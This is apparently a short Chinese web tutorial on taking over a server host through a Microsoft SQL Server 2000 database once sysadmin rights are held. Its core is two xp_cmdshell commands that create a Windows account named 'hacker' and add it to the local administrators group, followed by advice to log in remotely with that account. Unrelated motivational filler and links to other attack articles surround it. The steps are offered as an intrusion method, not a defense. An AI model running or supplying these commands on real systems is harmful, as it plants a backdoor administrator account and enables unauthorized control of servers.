通过MSSQL 2000 入侵服务器主机器的命令

要想捉大鱼,不能怕水深。要想摘玫瑰,就得不怕刺。没有灯的小路一样可以行走,只要心还在。不要只因一次挫败,就忘记你原先决定想达到的远方。你可以很有个性,但某些时候请收敛。
首先确保得到数据库超级管理员权限

然后执行如下SQL命令:

1、exec master.dbo.xp_cmdshell 'net user hacker hacker /add'
2、exec master.dbo.xp_cmdshell 'net localgroup administrators hacker /add'



解释:

1.通过调用cmdshell 也就是cmd 执行DOS 命令创建hacker用户

2 授权给hacker用户超级管理员权限..

3 这时候您就可以使用创建的帐户去远程登陆这台主机了

本文通过MSSQL 2000 入侵服务器主机器的命令到此结束。书是知识的宝库;书是提高的阶梯;书是人类的高级营养品。我们能够经过读书学习获得很多的知识,从而提高自我的才能,使自我变得聪明起来。小编再次感谢大家对我们的支持!

您可能有感兴趣的文章
什么是CC攻击 判断网站是否被CC攻击并且如何防御CC攻击

Windows系统安全风险-本地NTLM重放提权

文件上传漏洞全面渗透分析小结

sql手工注入语句&SQL手工注入大全

详解Filezilla server 提权